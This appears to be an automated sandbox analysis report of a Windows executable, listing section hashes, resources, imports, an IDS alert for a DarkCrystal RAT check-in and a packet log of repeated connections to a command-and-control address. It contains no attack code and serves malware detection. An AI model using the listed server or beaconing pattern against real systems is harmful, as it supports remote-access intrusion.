                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                  Resources

                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                  PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                                                  PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                                                  RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                                                                                  RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                                                                                  RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                                                                                  RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                                                                                  RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                                                                                  RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                                                                                  RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                                                                                  RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                                                                                  RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                                                                                  RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                                                                                  RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                                                                                  RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                                                                                  RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                                                                                  RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                                                                                  RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                                                                                  RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                                                                                  RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                                                                                  RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                                                                                  RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                                                                                  RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                                                                                  RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                                                                                  RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                                                                                  RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                                                                                  RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                                                                                  RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                                                                  Imports

                                                                                                                  DLLImport
                                                                                                                  KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                                                                  OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                                                  gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                                                                                  Possible Origin

                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                  EnglishUnited States

                                                                                                                  Network Behavior

                                                                                                                  Suricata IDS Alerts

                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2024-12-05T10:53:17.949836+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449734193.3.168.5080TCP

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 5, 2024 10:53:16.576716900 CET4973480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:16.696769953 CET8049734193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:16.696861029 CET4973480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:16.710395098 CET4973480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:16.830342054 CET8049734193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:17.066200972 CET4973480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:17.186105013 CET8049734193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:17.935105085 CET8049734193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:17.949781895 CET8049734193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:17.949829102 CET8049734193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:17.949836016 CET4973480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:17.981781960 CET4973480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:18.101766109 CET8049734193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:18.336882114 CET4973480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:18.384511948 CET8049734193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:18.456690073 CET8049734193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:18.580662966 CET4973480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:18.734464884 CET8049734193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:18.783822060 CET4973480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:19.978777885 CET4973480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:19.979149103 CET4974080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:20.099649906 CET8049734193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:20.099663973 CET8049740193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:20.099730015 CET4973480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:20.099776030 CET4974080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:20.104814053 CET4974080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:20.224565029 CET8049740193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:20.460542917 CET4974080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:20.471054077 CET4974180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:20.580271006 CET8049740193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:20.590759993 CET8049741193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:20.590835094 CET4974180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:20.595257044 CET4974180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:20.714961052 CET8049741193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:20.940305948 CET4974180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:21.060106993 CET8049741193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:21.060250998 CET8049741193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:21.336755037 CET8049740193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:21.486901045 CET4974080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:21.569391966 CET8049740193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:21.678308964 CET4974080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:21.829662085 CET8049741193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:21.875628948 CET4974480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:21.971406937 CET4974180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:21.995469093 CET8049744193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:21.996874094 CET4974480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:22.006339073 CET4974480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:22.061327934 CET8049741193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:22.126058102 CET8049744193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:22.283778906 CET4974180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:22.378456116 CET4974480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:22.498230934 CET8049744193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:22.565541983 CET4974080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:23.233376026 CET8049744193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:23.283808947 CET4974480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:23.465343952 CET8049744193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:23.613596916 CET4974180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:23.613677979 CET4974480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:23.613929987 CET4974580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:23.733680010 CET8049745193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:23.733748913 CET4974580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:23.733752966 CET8049741193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:23.733824015 CET4974180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:23.734152079 CET4974580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:23.734194040 CET8049744193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:23.734275103 CET4974480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:23.853815079 CET8049745193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:24.080730915 CET4974580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:24.144835949 CET4974680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:24.146629095 CET4974580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:24.200459003 CET8049745193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:24.264688015 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:24.265476942 CET4974680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:24.289794922 CET4974680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:24.309526920 CET8049745193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:24.409529924 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:24.649388075 CET4974680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:24.704881907 CET8049745193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:24.708786011 CET4974580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:24.769476891 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:24.769490004 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:24.769499063 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:24.769570112 CET4974680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:24.769586086 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:24.769634962 CET4974680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:24.769812107 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:24.769821882 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:24.769876957 CET4974680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:24.769911051 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:24.769922018 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:24.769970894 CET4974680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:24.770066977 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:24.770076990 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:24.770133018 CET4974680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:24.889657974 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:24.889708042 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:24.889755011 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:24.889765024 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:24.889765024 CET4974680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:24.889789104 CET4974680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:24.889794111 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:24.889816999 CET4974680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:24.889844894 CET4974680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:24.933533907 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:24.936855078 CET4974680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:25.053536892 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:25.053638935 CET4974680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:25.101795912 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:25.104041100 CET4974680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:25.141158104 CET4974880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:25.217597961 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:25.238255024 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:25.238373041 CET4974680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:25.260951042 CET8049748193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:25.261014938 CET4974880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:25.261147976 CET4974880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:25.358222961 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:25.358253956 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:25.358263969 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:25.358273983 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:25.358330965 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:25.358383894 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:25.358392954 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:25.358469963 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:25.358479023 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:25.358558893 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:25.358737946 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:25.358747005 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:25.358902931 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:25.359018087 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:25.359216928 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:25.380847931 CET8049748193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:25.508181095 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:25.580646992 CET4974680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:25.611988068 CET4974880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:25.731671095 CET8049748193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:26.074276924 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:26.246663094 CET4974680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:26.499133110 CET8049748193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:26.580671072 CET4974880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:26.733485937 CET8049748193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:26.860915899 CET4974680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:26.861126900 CET4974880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:26.861212969 CET4975080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:26.980896950 CET8049750193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:26.981057882 CET4975080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:26.981178999 CET4975080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:26.981286049 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:26.981350899 CET4974680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:26.981880903 CET8049748193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:26.982141972 CET4974880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:27.081751108 CET4975080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:27.082123995 CET4975180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:27.101108074 CET8049750193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:27.201828003 CET8049751193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:27.201899052 CET4975180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:27.201997995 CET4975180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:27.202207088 CET4975280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:27.245477915 CET8049750193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:27.321652889 CET8049751193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:27.321867943 CET8049752193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:27.322191954 CET4975280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:27.322307110 CET4975280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:27.441941977 CET8049752193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:27.549489975 CET4975180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:27.669254065 CET8049751193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:27.669337988 CET8049751193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:27.674469948 CET4975280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:27.794457912 CET8049752193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:27.949670076 CET8049750193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:27.949736118 CET4975080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:28.439523935 CET8049751193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:28.562184095 CET8049752193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:28.580650091 CET4975180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:28.611906052 CET4975280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:28.677506924 CET8049751193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:28.733004093 CET4975180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:28.797455072 CET8049752193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:28.846277952 CET4975280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:28.922827959 CET4975180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:28.922965050 CET4975280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:28.923289061 CET4975380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:29.043112993 CET8049753193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:29.043186903 CET4975380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:29.043292046 CET4975380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:29.043445110 CET8049751193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:29.043977022 CET4975180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:29.044405937 CET8049752193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:29.044461966 CET4975280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:29.163403988 CET8049753193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:29.393503904 CET4975380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:29.513381004 CET8049753193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:30.282882929 CET8049753193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:30.330672979 CET4975380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:30.517685890 CET8049753193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:30.565030098 CET4975380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:30.642108917 CET4975380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:30.642378092 CET4975480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:30.762159109 CET8049754193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:30.762173891 CET8049753193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:30.762255907 CET4975380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:30.762357950 CET4975480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:30.762357950 CET4975480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:30.882159948 CET8049754193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:31.112122059 CET4975480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:31.232314110 CET8049754193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:32.009406090 CET8049754193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:32.049436092 CET4975480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:32.245738029 CET8049754193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:32.299577951 CET4975480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:32.360023022 CET4975580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:32.479895115 CET8049755193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:32.479965925 CET4975580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:32.480103970 CET4975580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:32.599890947 CET8049755193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:32.830878973 CET4975580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:32.950721979 CET8049755193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:33.690920115 CET4975580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:33.691200972 CET4975680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:33.718775988 CET8049755193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:33.718904018 CET4975580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:33.811896086 CET8049756193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:33.812057972 CET4975680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:33.812182903 CET4975680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:33.812398911 CET4975780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:33.813009977 CET8049755193.3.168.50192.168.2.4
